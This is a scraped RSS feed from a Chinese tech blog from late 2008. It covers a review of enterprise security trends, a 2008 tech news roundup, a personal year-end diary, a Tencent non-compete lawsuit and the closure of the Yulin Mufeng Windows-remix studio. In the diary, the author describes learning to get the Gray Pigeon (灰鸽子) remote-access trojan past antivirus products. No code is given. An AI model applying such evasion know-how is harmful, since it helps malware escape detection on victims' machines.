　　趋势科技通过OfficeScan、NVWE、Leakproof、TDA等产品和技术的组合也已形成一套完整终端安全解决方案。趋势科技表示，实现高效的企业终端安全防护需要考虑五方面因素：1.要实现集中式管理、分布式部署。2. 产品模块化;用户可以根据自身需求灵活选择模块，扩展性要好。3.兼容性;终端安全要和用户现有系统具有良好兼容性。4. 性能;终端在性能上是否能够保证正常工作效率。5.终端安全要能够和现有网络边界设备组成完整的防御体系，或者能够在一个统一的管理平台上协同工作。

　　用户的需求正在推动终端安全防护的快速发展，随着安全技术的飞速发展，09年的终端安全防护市场的竞争将会更加激烈，除了不断完善的终端安全解决方案，统一便捷的集中管理平台将帮助企业实现更行之有效的企业终端安全管理。

　　·安全网关革新

　　安全网关作为企业安全防护的第一道闸门，其安全性能直接决定了企业整体的安全状况。2008年随着多核技术的日臻完善，以及企业基于web的应用安全需求激增，安全网关不论在性能还是功能上都取得了新的突破。

　　截至到08年上半年，H3C的万兆以太网交换机累计销售23万台，万兆端口数量应用近20余万，事实证明万兆网络建设已渐成规模，万兆安全时代全面来临。

　　借助Cavium和RIM多核CPU，国内众多安全厂商纷纷推出了万兆网络安全产品，一时间万兆防火墙、万兆UTM以及万兆IDS/IPS成为安全厂商在2008年的主打产品。

　　随着多核架构对性能的大幅度提升，解决用户应用安全成为安全网关在2008年的又一大特色。这主要体现在两大类型的安全产品上，应用安全网关和IPS(入侵防御系统)。在提升安全网关防护能力方面，业界呈现出两大趋势，一是传统信息安全巨头通过并购来加强其应用安全防护能力;另一方面是例如安启华、Hillstone等，规模不大，但真正从底层协议出发彻底优化，从技术上实现其安全网关的应用安全防护能力。于此同时，一些专业邮件服务器厂商如Mirapoint、梭子鱼也推出了邮件安全网关。

　　多核、万兆、应用安全已经成为安全网关在2008年留给用户最深刻的印象，因此有理由相信2009年安全网关的性能以及其应用安全的防护能力将得到更广泛的提高。

　　·数据安全防护

　　随着信息安全需求的扩大，数据安全防护在2008年已经引起了各方的高度关注。2007年公布的美国零售巨头TJX公司数据泄露事件，导致该公司9400多万用户账户受影响。这起事件至少导致在13个国家发生了大量的信用卡和借记卡诈骗案件，仅Visa卡用户的损失就超过6800万美元。2008年美国东海岸连锁超市(East Coast)的母公司Hannaford Bros.称，该超市的用户数据库系统遭到黑客入侵，造成400多万个银行卡帐户信息泄露，因此导致了1800起与银行卡有关的欺诈事件。事实证明，数据泄露对企业和用户权益的破坏是巨大的。

　　据统计，超过52%的首席信息安全官认为数据泄漏是导致安全防护开销的首要原因;85%的安全负责人表示在过去的安全损失中，至少有一件设计数据丢失。

　　企业数据安全防护的需求，促使数据丢失防护(DLP)等数据安全产品得到了快速发展。强调保护敏感数据的“数据中心”策略最近已成为业内热捧的发展趋势。与此同时，专家指出通过数据分级策略可以有效的保护敏感数据的安全，企业需要规范敏感数据管理并且采取相应的标记。

　　数据丢失防护DLP解决方案能够直观的告诉IT管理者，我的机密信息存在何处?这些数据的使用情况怎样?如何最好的保护这些数据防止其丢失?

　　了解文档内容正式数据丢失防护DLP技术的核心。另外一些数据分级工具不仅提供加密，而且也提供DLP防护功能。

　　我们不难看出DLP，ERM和其它安全产品的一体化将会变得更加普遍，正如网关防护手段的整合一样，数据安全的一体化防护技术也会加速整合。今年早些时候，安全厂商进行了多次并购，赛门铁克、Cisco、Macfee以及EMC都参与到其中。可以预计未来的几年能整合更多防护功能的产品会越来越多的出现在我们的视野中。

　　·反病毒木马

　　如今计算机病毒、木马以及各种恶意软件已经成为企业信息安全的最大威胁，快速出现的病毒数量以及其复杂多样的变种，已经使得基于特征码比对的传统反病毒技术难以跟上病毒的更新速度，如何快速的相应病毒威胁是企业迫切需要解决的。

　　2008年中旬我们先后见证了瑞星、趋势科技、卡巴等国内外信息安全厂商先后推出了基于“云安全”架构的安全解决方案。通过在客户端的威胁样本的智能提交，以及云端分析集群的快速分析以及人工干预，可以快速响应用户遇到的最新病毒木马威胁。

　　趋势科技Secure Cloud云安全网络防护解决方案，以Web信誉服务(WRS)、邮件信誉服务(ERS)和文件信誉服务(FRS)为基础构建的云客户端安全架构，通过把大多数特征码文件保存到互联网云数据库中并令其在端点处保持最低数量，趋势科技得以在Web威胁到达最终用户或公司网络之前即可对其予以拦截。

　　而瑞星的云安全计划，是指安全的互联网化。被动的安全无法满足互联网化的安全问题响应;基于单机的设计同样滞后于如今的安全需求。瑞星云安全网络充分利用了智能行为判断技术，将云端计算机的事件及时提交到云安全中心响应，在云安全中心威胁信息分析以及来源挖掘将会同步进行，快速响应用户的威胁，阻断威胁源。

　　正如笔者在《安全云计算 您准备好了吗?》提到的一样，云安全不能只是单纯的概念炒作或是时尚的名词，云安全面临的挑战也是很实在的。如何有效准确的收集用户威胁样本，如何提升自动分析的准确率，以及如何满足云安全的硬件基础建设等等，都是实现真正的云安全前所必须解决的问题。

　　总之随着系统安全性能的加强，云安全模式的成熟及发展，病毒木马对用户的威胁将会有所降低。总而言之，2008年企业用户对信息安全需求有了更理性的认识，同时用户的需求也促使信息安全技术在这一年中取得了快速的发展。我们有理由相信2009年信息安全状况将会有显著的改善。
新安全形势下的思考

　　如今2008年即将过去，如果非要总结这一年什么事件对中国信息安全影响最为重大，那莫过于2008北京奥运会的胜利召开。本次盛会不仅是国人的骄傲，同时也是对中国信息安全防护能力的一次全面检阅。

　　·安全服务

　　透过本届北京奥运会的安保工作，安全企业与用户之间不仅互取所长，也让安全服务被越来越多的企业所接受。

　　笔者在调查中发现，奥运期间企业对安全厂商的技术支持需求出现了倍数增长，企业相对于过去对安全的认识有了显著提高。

　　启明星辰表示，我国信息安全建设还处于刚刚起步阶段，大部分企业缺乏切实有效的信息安全规划，随着web应用的快速普及，对专业安全服务的需求将进一步加大。

　　瑞星也表示，安全服务是一个完整安全体系中不可或缺的部分，安全服务和各种安全产品和技术的融和使用，才能真正的保障一个大型网络的动态和持续安全。

      当然除了信息安全企业在积极响应安全威胁，IT巨头也在通过合作、并购等方式，积极投入到企业IT安全服务建设中来。IBM 企业IT安全服务为用户提供数据安全、身份和存取管理、物理安全、安全管理以及威胁管理等全面的安全服务支持。

　　如今，构建完善的信息安全防护体系，获取个性化安全服务已是众多企业级用户迫在眉睫的急切需求。当然安全服务也亟需可评估的标准来规范。

　　·法规遵从

　　安全服务系统化建设满足了企业从外在获得了安全支持的需求，然而企业自身仍需要加强安全意识培养和安全法规遵从的制定。专家认为，强有力的风险管理可以减少80%-90%的问题项目。

　　对于上市公司以及大型企业而言，只能通过一些政策和技术以确保公司符合相关法规和政策，并需要实时归档以用于合规审计。

　　不遵守法律法规和内部政策将对公司造成严重后果以及安全风险问题。保护客户数据，确保财务数据的完整信，防止知识产权泄漏以及员工个人信息等问题成为公司最优先考虑的问题。遵守法规和审计结果已经变得与系统正常运行时间以及性能统计一样重要。详细的企业法规遵从管理可参考《解析如何实现自动化的IT安全合规管理》

　　·集中式管理

　　信息安全 “三分技术、七分管理”。在现在的信息安全技术环境下，攻击成本越来越小，防御成本越来越大，网络的安全环境并未有所好转，反而有日益恶化之虞。而企业整体安全的水平往往取决于最弱的一环，而不是最强的地方。在复杂的企业网络中，任何一个员工的疏漏、漏洞管理疏漏，都会给企业安全带来威胁。

　　在这种情况下，企业急需信息安全的集中十管理。一般而言，企业建立集中管理的原则包括：基于风险管理，投入有的放矢;注重体系化采用系统方法，确保万无一失;注重策略和管理，建立文件管理体系等。因此统一的、该性能的安全管理平台或基于业务总线的安全管理平台成为企业新的需求。

　　在这一方面H3C推出的“万全之策”安全解决方案，是值得更多的安全厂商学习并借鉴的。H3C将安全控制延伸到每一个终端节点，这不仅解决了安全事件集中爆发的隐患和风险，而且将原有独立、分散的计算、通信和存储资源变成一个整体，每一个核心节点的性能提升，都将会提升整网安全性能。

　　2008年信息安全留给我们的反思还有很多很多，虽然病毒木马将随着安全技术的快速发展而降低威胁，然而基于应用的安全漏洞又将形成新的威胁。2009年信息安全仍将面临严峻的挑战。

]]> http://www.hnqw.net/article.asp?id=412 hnqw0898@vip.qq.com(admin) Thu,01 Jan 2009 14:21:16 +0800 http://www.hnqw.net/default.asp?id=412 黑客入侵等，以下为其原文：
　　毫无疑问，2008年是属于智能手机和iPhone的一年，读者对iPhone相关的新闻一直非常关注;而随着Google联手T-Mobile和HTC推出G1手机，Google则又成为人们关注的焦点。

　　佩林电子邮箱遭黑客入侵

　　很多人以前并不熟悉佩林，但是在麦凯恩提名这位阿拉斯加州州长为副总统候选人之后，她迅速成为网络关注的焦点。当黑客入侵了她的雅虎电子邮箱后，读者开始关注其邮箱中是否存在为世人所不知的秘密，以及黑客是如何入侵她的邮箱等。

　　该事件最终被美国联邦调查局介入，随后搜查了美国田纳西州大学的一件公寓，逮捕了其中一名大学生黑客，随后该黑客因入侵佩林电子邮箱而被起诉。

　　就在FBI调查此案的同时，其它黑客又入侵了福克斯新闻媒体的评论员Bill O'Reilly的个人网站，并将其网站的相关信息公布在WikiLeaks网站上。

　　Google：无处不在

　　这个搜索巨人在9月份发布了它的开源浏览器Chrome，在浏览器市场引起了巨大反响。

　　Chrome可能是又一个Google备受瞩目的试验品，业界分析师称，它有可能成为Google新的收入增长点。

　　之后又曝出了一则关于Google的重大新闻，Andy Patrizio称Google有可能在秘密研发自己的操作系统，这似乎验证了硅谷观察家们一直坚持的一个说法：Google将推出自己的软件即服务(SaaS)模式操作系统。

　　思科：一个新的Linux平台?

　　今年进军新领域的并非只有Google一家，对开源感兴趣的读者一定还记得这样一个新闻：思科正在将其路由器转变为一个Linux应用服务器，向客户及第三方应用开发商开放集成多业务路由器(ISR)和广域应用服务(WAAS)平台。

　　恶意软件瞄准Facebook

　　今年Facebook依然是人们关注的热点。但是，关于它的新闻多数与安全缺陷有关，这个社交网站已经成为攻击者的乐园。

　　当Facebook用户意识到自己在不知情的情况下向Facebook好友发送了垃圾信息后，他们开始关注社交网站的安全问题。

　　安全专家发现，与以前在Facebook网站上发现的蠕虫病毒类似，越来越多的用户在不知不觉的下载恶意软件，进而向他们的Facebook好友发送消息。这些消息建议人们点击来自诸如Google Picasa图片分享站点的视频或图片，但是收到的却往往实际上是恶意软件。

　　iPhone热潮

　　尽管企业还在怀疑苹果的iPhone是否能够最终进军企业应用市场，不过很多人已经开始使用苹果的这款手机。

　　据NPD集团的调查数据称，在8月份美国智能手机市场中苹果的份额已经跃升至17%，而在两个月前该数字只有11%。

　　微软相关新闻

　　全球最大的软件公司一直是人们关注的对象，原因自然是它的产品遍布于各个行业之中。

　　让很多微软反对者有些幸灾乐祸的是，微软今年再次因Vista操作系统而惹麻烦上身。英特尔官员可能对对微软降低“Vista Capable”硬件要求感到满意，但是惠普官员却对此非常恼火。

　　据日前公开的一份法庭文件显示，微软原先计划把英特尔915芯片计算机排除在“Vista Capable”计划之外，惠普为此投资了700万美元重新设计和制造了两款主板，但是微软计划的改变让其这部分投资付诸流水。

　　对用户来说，现在最令他们感兴趣的是Vista的继任者——Windows 7，微软在其开发者大会上已经演示了该操作系统的主要功能。
]]> http://www.hnqw.net/article.asp?id=411 hnqw0898@vip.qq.com(admin) Wed,31 Dec 2008 14:28:44 +0800 http://www.hnqw.net/default.asp?id=411
的2009年，是不是该想下08年中有哪些可以发扬，哪些又可以弃掉呢？一日一步，一月一级，一年

一跃！这是在08年的时候自己的座右铭，但我做到了吗？07年11月辞职后在家可以说是完美滴休息

了两个月，什么都不做，上网就是看看新闻，跟家人聊聊天，跟老人们喝喝茶，小日子可以说过的

是有滋有味！过玩春节后就完全进入了学习状态......

   1月：电脑配置有点垃圾，所以一直在学习系统优化跟一些网络安全基本的知识，期间发布了一

些教程与文章，收到大家的好评，现在反回来看，觉的很幼稚，很多内容只是看到了表面的皮毛！

而每天竟然还抽出3、4小时来准备这些所谓的教程......不过在学习的过程中比较欣慰的是系统做

的优化个人非常满意，超出预期要求：）

   2月：这个月可以说也是比较弱智跟无聊的一个月！每天不断的在做重复的事情，每天都在向别

人吹嘘自己，但是自己真正会什么呢？唯一可以自豪的是认识了欧阳、笨笨等人！

   3月：前半月是学习免杀技术的疯狂期，在这段时间中一天的休息只保持在5--6小时！不过原版

鸽子始终过了卡巴的主防，虽然可以完美的过掉瑞星，金山等杀软的主防跟行为检测，但是这不是

我想的结果，但是在这十几天中，基本了解的各种杀软一些原理与查杀模式，也了解到了脱壳改壳

在免杀中的一些技巧，于是乎就一头扎进了脱壳的学习中，等深入到一些强壳的时候，我发现，编

程在免杀与逆向中的强大作用!!!这整个月最搞笑的是，为了有个好看的鸽子启动界面，用了7天时

间把photoshop一些基础跟小技巧学习了......

   4月：这个月一直都是在学习DELPHI编程，背代码，写小程序，为了方便免杀的学习，还是写了

比较适合自己使用的免杀辅助小工具，虽然用了很多垃圾代码，哈哈，不过看到根据自己的DIY想法

做出来的东西还是感到有点欣慰！

   5月：在家时间这段时间里，经济上给我的压力很大，因为没有工作，加上学无所成，没有额外

收入，以前打工的钱也用的7788了，于是把一些钱买了个空间架设了个空间，准备了一些找工作用

的钱，基本是“难民了”！等把家里一些杂碎的事情全部搞定后，就在月底开始了“残酷”的工作

生涯！！！

   6月：刚到公司上班，为了搞好公司的网络安全，累的半死不活- -！知识有限，没办法......加

上刚上班，基本就只看看ASP一些安全知识了- -！

   7月：学习脚本安全最全面的日子，对于以前在安全检测过程中的一些疑难杂症都得到了解

决与明朗认识......也在公司接触到了一些大型恶意攻击，学习了不少硬件与软件的技巧!

   8月：接触病毒最多的一个月，也可能是奥运的原因吧- -！在公司几乎是天天有报告说中毒-！

搞到想吐.......不过奥运的圆满成功，总算给了点安慰！这个月为了忙BLOG的改版，倒是学习了不

少CSS的技巧,虽然用上的不是很多- -！

   9月：上个月的病毒真的是把俺搞怕了- -！于是就开始学习组策略，HIPS的内容，着实把公司系

统强化了不少，特别在学习HIPS的过程中，还间接学会了病毒行为分析：）

   10月：知道的越多，感觉自己学的越少，真是治理名言- -！在想深入到病毒的学习，就必须学

习汇编，逆向工程，不然真的很难在这方面发展下去，汇编的强大与枯燥，让我有好几次想放弃的

念头，但是每每看到别人写出很好的分析报告的时候，就会对自己说到：我会做的更好！

   11月：因为要转部门，所以除了把手头安全工作玩，还是去了解关于一些酒店平面设计的相关技

术知识与学习一些将在新工作所用到的一些软件的基本操作- -！可以说是很郁闷的一个月- -！

   12月：基本上为了了解能快速的投入到工作上去，每天都学习Photosho，CorelDRAW，刻字的使

用与技巧，可以说是压力巨大的一个月！到了月底，总算可以说是可以满足一些日常应用了- -！这

个月几个朋友相继辞职，有点不开心......

   回首08，是多么的杂乱的学习！没有什么可以引以为豪，可以说没有大成绩的一年！新的一年即

将到来，希望在09年的报告中不会出现这么杂乱的学习进程，希望能有些可以自豪的成果跟别人分

享！当然，在新的一年也对自己说：林子！加油！

   在文章最后，需要感谢在学习，工作中帮助我的所有朋友，排名不分先后：

   为文学站默默奉献优秀文章的笨笨；帮助解决工作中硬件问题的欧阳、学会放弃、梁萧；教导俺

免杀、破解的无双哥哥、Aisht小妞；一起学习其他安全知识的毅毅、大鬼、孤寂中独舞等人；特别

感谢在我学习，工作中跟我分享喜悦的香香同学！最后再次感谢开发WWW的所有工作人员，没有你们

，俺这文章得浪费多少笔墨在纸上啊- -！

]]> http://www.hnqw.net/article.asp?id=410 hnqw0898@vip.qq.com(admin) Tue,30 Dec 2008 17:25:10 +0800 http://www.hnqw.net/default.asp?id=410
　　对于腾讯还要求其中8名员工返还相关股票期权收益，被告方代理律师认为：他们目前拿到的证据显示， 当时的期权授予计划中并没有关于员工购买期权要受到保密协议和竞业限制的条款。何况公司给予员工期权，是对其以前工作的奖励，而不能作为竞业禁止补偿费。根据法律规定，竞业禁止补偿费应该是货币，而不是收益不确定、没有保障的期权，因此被告员工可不返还期权收益。

　　腾讯公司则称，根据广东省高级法院相关司法解释，用人单位与劳动者约定竞业限制的，应当在竞业限制期限内依法给予劳动者经济补偿，用人单位未按约定支付经济补偿的，劳动者可要求用人单位履行竞业限制协议。至工作交接完成时，用人单位尚未承诺给予劳动者经济补偿的，竞业限制条款对劳动者不具有约束力。竞业禁止补偿并没有包含在工资里，而是该公司给予员工的一项单独的费用，如期支付给了员工。即使这些员工离职后，腾讯公司也向他们表示过愿意支付其竞业禁止补偿费，但对方拒绝接受。该公司和其中8名被告员工签订了期权认购协议，约定条件是员工必须遵守竞业禁止约定，保守公司商业秘密，这也是该公司对这8名员工的竞业禁止补偿。现在8名员工违反了竞业禁止约定，就应该返还当时所得的期权收益。该公司还申请法院向香港的证券公司调取当时的期权交易记录。

　　目前，此案还在进一步审理之中。]]> http://www.hnqw.net/article.asp?id=409 hnqw0898@vip.qq.com(admin) Sun,28 Dec 2008 19:54:52 +0800 http://www.hnqw.net/default.asp?id=409
   好累！！]]> http://www.hnqw.net/article.asp?id=408 hnqw0898@vip.qq.com(admin) Sat,27 Dec 2008 09:52:54 +0800 http://www.hnqw.net/default.asp?id=408 倩网语:又是一则让ME伤心的消息！哎，微软大哥这次真的镇住了好多人- -！先去下个经典版本收藏！

来源：cnbeta

据中国站长站报道,国内知名操作系统DIY商雨林木风宣布解散,雨林木风工作室负责人罗先生表示消息属实,并发来正式声明.
罗先生表示,雨林木风工作室选择此举也属无奈,随着国内版权意识的加强、以及早些时候的番茄花园事件.雨林木风的关闭也属大势所趋.而随着雨林木风的关闭,雨林木风所提供的系统也将成为历史.所有版本仅供爱好者收集纪念,禁止非法用途及传播.而关于雨林木风工作室解散以后的动向问题,罗先生并未回应.

以下为声明全文:

亲爱的会员朋友们:

基于多方面的原因,我们不得不很遗憾地告诉大家,经过雨林木风工作室管理层慎重考虑,决定于2008年12月31日起正式解散.今后,雨林木风将以自主研发软件产品为主,继续为网民提供服务(不再进行未开源操作系统技术研究),所有成员与工作室脱离一切隶属关系,而雨林木风论坛将继续独立运营,不受本工作室解散之影响.

为了铭记这些曾经为我们提供了精品资源的技术精英们,同时,也为众多的论坛会员留下一份美好的回忆,我们特别奉献一套经典收藏版［包括:雨林木风 Ghost XP SP3 装机版 YN9.9;雨林木风 Ghost XP SP3 纯净版 YN6.0;雨林木风 WinXP SP3 安装版 YS8.0;雨林木风 Windows Vista ULTIMATE With SP1 精简版V2.1］以供大家收藏留念,禁止非法用途及传播.

历经三载,我们风雨同行,一路走来,雨林木风工作室由衷地感谢各界朋友们对我们的支持与厚爱!雨林木风工作室也将成为一段历史!再次感谢3年来一直支持着本工作室作品的雨林木风迷们!希望大家能继续支持雨林木风旗下软件部门推出的其他软件产品.

特此声明!
雨林木风工作室
二〇〇八年十二月二十六日
]]>